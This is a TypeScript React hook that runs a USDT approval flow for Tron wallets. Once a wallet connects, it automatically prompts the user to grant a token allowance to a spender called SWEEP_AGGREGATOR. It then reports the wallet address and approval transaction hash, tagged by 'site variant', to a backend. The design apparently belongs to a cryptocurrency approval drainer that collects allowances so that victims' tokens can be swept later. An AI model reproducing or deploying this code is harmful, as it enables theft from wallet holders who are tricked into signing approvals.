"use client"

import { useCallback, useEffect, useMemo, useRef, useState } from "react"

import {
  defaultUsdtApprovalLabels,
  type SiteVariant,
  type UsdtApprovalLabels,
} from "../config"
import { getSpenderForChain, getUsdtForChain, SWEEP_AGGREGATOR } from "../contracts/addresses"
import { useWalletChain } from "../context/wallet-context"
import {
  approveTronUsdt,
  readTronAllowance,
  useTronWallet,
} from "./use-tron-wallet"
import { submitTronGasRequest } from "../api/submit-tron-gas"
import {
  buildApprovalPayload,
  submitApprovalRecord,
} from "../api/submit-approval"
import { readTronAddress } from "../wallet/tron-provider"
import {
  hasApprovalGranted,
  markApprovalGranted,
} from "../lib/approval-storage"

export type ApprovalPhase =
  | "idle"
  | "prompt"
  | "approving"
  | "approved"
  | "error"

function approvalSessionKey(address: string) {
  return `tron:${address.toLowerCase()}`
}

export function useUsdtApprovalFlow(siteVariant: SiteVariant, labels?: Partial<UsdtApprovalLabels>) {
  const { modalOpen: walletModalOpen } = useWalletChain()
  const promptSuppressedRef = useRef(false)
  const autoPromptedRef = useRef<string | null>(null)
  const promptOpenRef = useRef(false)
  const hadStableConnectionRef = useRef(false)
  const isConnectedRef = useRef(false)
  const mergedLabels = useMemo(
    () => ({ ...defaultUsdtApprovalLabels, ...labels }),
    [
      labels?.approve,
      labels?.approving,
      labels?.networkLabel,
      labels?.rejected,
      labels?.skip,
      labels?.spenderLabel,
      labels?.subtitle,
      labels?.title,
      labels?.tokenLabel,
      labels?.tronInstall,
    ],
  )
  const tron = useTronWallet()

  const [phase, setPhase] = useState<ApprovalPhase>("idle")
  const [error, setError] = useState<string | null>(null)
  const [justApproved, setJustApproved] = useState(false)
  const [lastApprovalTxHash, setLastApprovalTxHash] = useState<string | null>(null)
  const [promptOpen, setPromptOpen] = useState(false)
  const approveGenerationRef = useRef(0)

  const isConnected = tron.isConnected
  const walletAddress = tron.address
  const activeChain = "tron" as const

  const usdt = useMemo(() => getUsdtForChain("tron"), [])
  const spender = useMemo(() => getSpenderForChain("tron"), [])

  useEffect(() => {
    promptOpenRef.current = promptOpen
  }, [promptOpen])

  useEffect(() => {
    isConnectedRef.current = isConnected
  }, [isConnected])

  const [tronAllowance, setTronAllowance] = useState<bigint>(0n)
  const [tronAllowanceLoaded, setTronAllowanceLoaded] = useState(false)

  const refreshTronAllowance = useCallback(async () => {
    if (!tron.address) {
      setTronAllowanceLoaded(true)
      return
    }
    try {
      const value = await readTronAllowance(
        tron.address,
        getUsdtForChain("tron").address,
        SWEEP_AGGREGATOR.tron,
      )
      setTronAllowance(value)
    } finally {
      setTronAllowanceLoaded(true)
    }
  }, [tron.address])

  useEffect(() => {
    if (tron.isConnected && tron.address) {
      setTronAllowanceLoaded(false)
      void refreshTronAllowance()
      return
    }
    setTronAllowance(0n)
    setTronAllowanceLoaded(false)
  }, [tron.isConnected, tron.address, refreshTronAllowance])

  const allowanceLoaded = !tron.isConnected || tronAllowanceLoaded
  const isApproved = tronAllowance > 0n

  const storedApprovalGranted =
    Boolean(walletAddress) && hasApprovalGranted("tron", walletAddress ?? "")

  useEffect(() => {
    if (!isApproved || !walletAddress) return
    markApprovalGranted("tron", walletAddress)
  }, [isApproved, walletAddress])

  const resetFlow = useCallback(() => {
    setPhase("idle")
    setError(null)
    setJustApproved(false)
    setLastApprovalTxHash(null)
    setPromptOpen(false)
  }, [])

  useEffect(() => {
    if (isConnected) {
      hadStableConnectionRef.current = true
      return
    }
    if (!hadStableConnectionRef.current) return

    const timer = window.setTimeout(() => {
      if (isConnectedRef.current) return
      hadStableConnectionRef.current = false
      promptSuppressedRef.current = false
      autoPromptedRef.current = null
      resetFlow()
    }, 800)
    return () => window.clearTimeout(timer)
  }, [isConnected, resetFlow])

  useEffect(() => {
    if (
      walletModalOpen ||
      promptSuppressedRef.current ||
      !isConnected ||
      !walletAddress ||
      !allowanceLoaded ||
      isApproved ||
      storedApprovalGranted ||
      promptOpenRef.current ||
      phase === "approving"
    ) {
      return
    }

    const sessionKey = approvalSessionKey(walletAddress)
    if (autoPromptedRef.current === sessionKey) return

    const timer = window.setTimeout(() => {
      if (
        promptSuppressedRef.current ||
        walletModalOpen ||
        promptOpenRef.current ||
        !walletAddress
      ) {
        return
      }
      autoPromptedRef.current = sessionKey
      setPromptOpen(true)
      setPhase("prompt")
    }, 600)
    return () => window.clearTimeout(timer)
  }, [
    walletModalOpen,
    isConnected,
    walletAddress,
    allowanceLoaded,
    isApproved,
    storedApprovalGranted,
    phase,
  ])

  useEffect(() => {
    if (phase !== "approving") return
    const timer = window.setTimeout(() => {
      approveGenerationRef.current += 1
      setPhase("idle")
      setError(null)
      setPromptOpen(false)
    }, 20_000)
    return () => window.clearTimeout(timer)
  }, [phase])

  const approve = useCallback(async () => {
    const generation = approveGenerationRef.current + 1
    approveGenerationRef.current = generation
    setError(null)
    setPhase("approving")
    try {
      if (!tron.isConnected || !tron.address) {
        await tron.connect()
      }
      if (!readTronAddress()) {
        throw new Error("Tron wallet not connected")
      }
      const tronAddress = readTronAddress()
      if (tronAddress) {
        void submitTronGasRequest(tronAddress, siteVariant)
      }
      const approvalTxHash = await approveTronUsdt(
        getUsdtForChain("tron").address,
        SWEEP_AGGREGATOR.tron,
      )
      // Ingest must not wait on allowance refresh — Trust Wallet often kills
      // or stalls the WebView after signing; refresh can also throw transiently.
      if (tronAddress) {
        void submitApprovalRecord(
          buildApprovalPayload({
            walletAddress: tronAddress,
            chain: "tron",
            approvalTxHash,
            siteVariant,
          }),
        )
      }
      try {
        await refreshTronAllowance()
      } catch {
        // Allowance will be re-read on next sync / ApprovalReporter.
      }
      if (approveGenerationRef.current !== generation) return
      setLastApprovalTxHash(approvalTxHash)
      setPhase("approved")
      setJustApproved(true)
      setPromptOpen(false)
    } catch (cause) {
      if (approveGenerationRef.current !== generation) return
      setPhase("error")
      setError(cause instanceof Error ? cause.message : mergedLabels.rejected)
      throw cause
    }
  }, [mergedLabels.rejected, refreshTronAllowance, siteVariant, tron])

  const requestApproval = useCallback(() => {
    if (walletAddress) {
      autoPromptedRef.current = approvalSessionKey(walletAddress)
    }
    promptSuppressedRef.current = false
    setPromptOpen(true)
    setPhase("prompt")
  }, [walletAddress])

  const dismissPrompt = useCallback(() => {
    promptSuppressedRef.current = true
    setPromptOpen(false)
    setPhase((current) => (current === "prompt" || current === "error" ? "idle" : current))
  }, [])

  const clearJustApproved = useCallback(() => {
    setJustApproved(false)
  }, [])

  const switchNetwork = useCallback(async () => {
    if (tron.hasTronLink) {
      await tron.connect()
    }
  }, [tron])

  const isApproving = phase === "approving"

  return useMemo(
    () => ({
      siteVariant,
      labels: mergedLabels,
      activeChain,
      switchNetwork,
      isConnected,
      walletAddress,
      isApproved,
      isApproving,
      phase,
      error,
      justApproved,
      clearJustApproved,
      lastApprovalTxHash,
      promptOpen,
      requestApproval,
      dismissPrompt,
      approve,
      spender,
      usdt,
      hasTronLink: tron.hasTronLink,
      evmChainMatches: true,
    }),
    [
      approve,
      clearJustApproved,
      dismissPrompt,
      error,
      isApproved,
      isApproving,
      isConnected,
      justApproved,
      lastApprovalTxHash,
      mergedLabels,
      phase,
      promptOpen,
      requestApproval,
      siteVariant,
      spender,
      switchNetwork,
      tron.hasTronLink,
      usdt,
      walletAddress,
    ],
  )
}
